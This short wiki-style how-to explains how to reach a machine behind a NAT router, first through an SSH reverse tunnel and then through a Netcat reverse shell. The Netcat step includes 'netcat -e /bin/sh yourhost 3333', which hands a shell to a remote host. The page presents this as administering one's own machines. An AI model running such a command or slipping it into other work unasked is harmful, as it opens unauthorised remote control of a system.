Reverse Shell

A reverse shell is needed to connect to a remote host that is on a local area network, behind a Network Address Tranlsation (NAT) router.

We use the term remote host to refer to the machine you are connecting to that is behind the NAT router.

We use the term your host to refer to the machine you are connecting from.

SSH Reverse Shell

This solution requires that the remote host is running an SSH daemon.

From the remote host:

    ssh -NR 3333:localhost:22 user@yourhost

From your host:

    ssh user@localhost -p 3333

If you get an error when running the command on your host similar to the following, it may be caused by not having an SSH daemon running on the remote host.

    ssh_exchange_identification: Connection closed by remote host

Netcat Reverse Shell

If the remote host isn't running an SSH daemon, you can connect using Netcat. This connection will be unecrypted.

On your host run Netcast to listen for connections:

    netcat -v -l -p 3333

On the remote host establish a connection to your host:

    netcat -e /bin/sh yourhost 3333

You now have a remote shell running on your host without a prompt. You can enter commands and see the response.


Related Topics: VncTips

-- Frank Dean - 12 Mar 2010